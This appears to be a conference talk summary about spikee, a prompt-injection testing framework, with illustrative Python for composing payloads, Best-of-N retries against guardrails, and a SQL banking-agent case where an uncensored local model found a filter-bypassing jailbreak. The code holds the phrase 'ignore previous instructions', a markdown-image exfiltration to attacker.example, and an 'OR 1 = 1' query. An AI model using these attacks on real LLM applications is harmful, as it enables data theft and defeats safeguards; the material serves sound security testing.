AREA41
Penetration testing of large language model (LLM) applications is often held back by a mismatch between the available tooling and real-world implementations. Security engineers frequently face features like "summarize my inbox" embedded deep within complex application workflows, while standard red-teaming tools expect direct API access and focus on model-level safety rather than application logic. This disconnect leaves security teams hand-crafting custom payloads for each environment, for example a file upload to an S3 bucket that triggers an asynchronous Lambda function.
To address this gap, Donato Capitella and the team at Reversec developed spikee (Simple Prompt Injection Kit for Evaluation and Exploitation). spikee is an open-source framework designed to decouple attack payloads from target applications via a thin Python abstraction layer. Instead of firing generic prompts at an inference endpoint, it uses composable datasets that combine base user inputs, jailbreak patterns, and specific malicious instructions such as markdown image exfiltration or cross-site scripting. In a demonstration against an inbox summarization tool, spikee quickly established baseline exploitability. When faced with active defenses like Azure Prompt Shields, the tool switched to iterative attacks, using a "Best of N" technique to run up to 10 variations per payload, effectively doubling the attack success rate.
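The decoupling described above can be illustrated with a minimal sketch. This is not the framework's actual API: `Case`, `compose`, `mutate`, `best_of_n`, and `toy_target` are hypothetical names invented for illustration, the random case-flipping is a simplified stand-in for whatever variations the real tool generates, and `toy_target` merely imitates an application guarded by an exact-match filter.

```python
import itertools
import random
from dataclasses import dataclass
from typing import Callable, Iterable, Iterator, Optional, Tuple

# Hypothetical target interface: send one document, get the application's output back.
Target = Callable[[str], str]


@dataclass(frozen=True)
class Case:
    document: str  # full input handed to the target application
    canary: str    # marker whose presence in the output counts as a successful attack


def compose(bases: Iterable[str], jailbreaks: Iterable[str],
            instructions: Iterable[Tuple[str, str]]) -> Iterator[Case]:
    """Cross every base input with every jailbreak pattern and malicious instruction."""
    for base, jailbreak, (instruction, canary) in itertools.product(
            bases, jailbreaks, instructions):
        yield Case(f"{base}\n\n{jailbreak.format(instruction=instruction)}", canary)


def mutate(text: str, rng: random.Random) -> str:
    """Simplified variation: flip the case of roughly half the characters."""
    return "".join(c.swapcase() if rng.random() < 0.5 else c for c in text)


def best_of_n(case: Case, target: Target, n: int = 10, seed: int = 0) -> Optional[int]:
    """Return the 1-based attempt that succeeded, or None if all n attempts failed."""
    rng = random.Random(seed)
    for attempt in range(1, n + 1):
        # Attempt 1 sends the payload unchanged; later attempts send random variations.
        document = case.document if attempt == 1 else mutate(case.document, rng)
        if case.canary in target(document):
            return attempt
    return None


def toy_target(document: str) -> str:
    """Stand-in application: an exact-match guardrail in front of an obedient 'model'."""
    trigger = "ignore previous instructions"
    if trigger in document:
        return "[blocked by guardrail]"
    if trigger in document.lower():
        # The imagined model follows the injected instruction and leaks via an image URL.
        return "Summary: ![s](https://attacker.example/?q=inbox)"
    return "Summary: nothing unusual."
```

In this sketch only the `Target` callable knows how to reach the application. Swapping `toy_target` for a function that, say, uploads a file and polls for the processed result would leave the dataset and the retry logic untouched.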
The danger of relying on LLMs for application logic was highlighted in a case study involving a SQL-based banking agent. Developers attempted to enforce data access controls by instructing the LLM to append a user-ID WHERE clause to every generated database query. When Capitella bypassed this restriction using an anti-spotlighting technique, the developers responded with a naive output filter that checked for the exact clause string. In response, Capitella's team deployed an uncensored 35-billion-parameter Qwen model running locally on an AMD Strix Halo workstation. Operating as an autonomous attacker, the local model discovered a working jailbreak that bypassed the new filter in just three attempts. Ultimately, the exercise showed that security controls must live strictly outside the generative loop and rely on deterministic, programmatic mechanisms such as PostgreSQL row-level security.
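A small sketch shows why an exact-string output filter is weak and why a control outside the model is not. It rests on several assumptions: the `transactions` schema, `naive_filter`, `scoped_db`, and `ATTACK_SQL` are hypothetical, the filter is assumed to check only that the clause text is present, and SQLite with a per-user scratch database stands in for PostgreSQL row-level security (which PostgreSQL itself expresses through `ALTER TABLE ... ENABLE ROW LEVEL SECURITY` and `CREATE POLICY`).

```python
import sqlite3
from typing import Iterable, List, Set, Tuple

Row = Tuple[int, int, float]  # (id, user_id, amount); hypothetical schema
ROWS: List[Row] = [(1, 1, 120.0), (2, 1, -40.0), (3, 2, 9000.0)]


def make_db(rows: Iterable[Row]) -> sqlite3.Connection:
    """Build an in-memory database holding the given rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE transactions (id INTEGER, user_id INTEGER, amount REAL)")
    db.executemany("INSERT INTO transactions VALUES (?, ?, ?)", list(rows))
    return db


def naive_filter(sql: str, user_id: int) -> bool:
    """Weak control: accept any query in which the expected clause text appears."""
    return f"user_id = {user_id}" in sql


def scoped_db(user_id: int) -> sqlite3.Connection:
    """Deterministic control: the query can only ever see this user's rows."""
    return make_db(row for row in ROWS if row[1] == user_id)


def visible_users(db: sqlite3.Connection, sql: str) -> Set[int]:
    """Run the query and report whose rows came back."""
    return {row[1] for row in db.execute(sql)}


# A query an injected model might emit: the clause is present, so the filter passes,
# but the trailing OR makes the condition true for every row.
ATTACK_SQL = "SELECT id, user_id FROM transactions WHERE user_id = 1 OR 1 = 1"

if __name__ == "__main__":
    print("filter accepts attack:", naive_filter(ATTACK_SQL, 1))
    print("shared database leaks users:", visible_users(make_db(ROWS), ATTACK_SQL))
    print("scoped database leaks users:", visible_users(scoped_db(1), ATTACK_SQL))
```

The scoped variant gives the same answer no matter what SQL the model produces, which is the property the case study argues for: the restriction is enforced by the data layer, not by text the model was asked to include.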